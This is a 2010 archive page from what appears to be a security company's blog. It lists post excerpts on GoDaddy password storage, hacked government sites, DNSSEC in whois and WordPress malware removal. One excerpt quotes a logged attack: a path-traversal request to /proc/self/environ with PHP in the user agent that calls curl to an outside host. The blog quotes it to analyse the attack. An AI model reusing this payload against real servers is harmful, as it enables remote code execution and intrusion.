Monthly Archives: February 2010

GoDaddy Security update

My last post, “GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission”, got a lot of traction and it reached the ears of the GoDaddy people! I just got off the phone with … Read more


Posted in Uncategorized | 70 Comments

GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission

*UPDATE: I just got off the phone with Neil Warner, GoDaddy’s CSO (Chief Security Officer) and he explained the situation to me. Check it out: GoDaddy Security update. I have been a GoDaddy user for a while and never had … Read more


Posted in Uncategorized | 66 Comments

.ORG whois reporting DNSSEC status

I was glad to see a handful of whois updates today coming from all the .ORGs that we are monitoring at Sucuri. Basically now at the end of the Whois, it is showing if that domain is using DNSSEC or … Read more


Posted in Uncategorized | 3 Comments

Colombia Government sites hacked (and spreading malware)

You would expect that a security-related web site would be secure, no? What about an official web site from a Government? Should that be safe? What about a government web site about security? Shouldn’t that be ultra super secure? (yes, … Read more


Posted in Uncategorized | 8 Comments

PHP in the user agent (attacking log analysis tools?)

Lately I started to see a few web-based attacks with a PHP script inside the user agent. Something like this: a.b.229.82 - - [19/Jan/2010:22:43:39 -0700] "GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3820 "-" "< ? echo '_rce_';echo php_uname();echo '_rce_';$ch=curl_init();curl_setopt($ch, CURLOPT_URL, 'http://websalesusa.com/ken');curl_setopt($ ch, … Read more


Posted in Uncategorized | 5 Comments

Georgia government sites hacked (and spreading malware)

*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect. You know, you would think that after all the attacks that Georgia suffered in 2008 they would … Read more


Posted in Uncategorized | 5 Comments

Removing Malware from a WordPress blog – Case Study

Early this week we were hired to remove some malware from a quite popular web site. The malicious code was there for a little while and the site got blacklisted by Google. That’s how the owner noticed it. Every time someone … Read more


Posted in hacked, malware, security, sucuri, wordpress | 15 Comments

Amazon.com blacklisted by SpamHaus XBL

Update: Spamhaus contacted us to let us know that they removed Amazon from the blacklist and are investigating the issue. Spamhaus has various blacklists and one of them is the XBL: “The Spamhaus Exploits Block List (XBL) is a realtime … Read more


Posted in Uncategorized | 3 Comments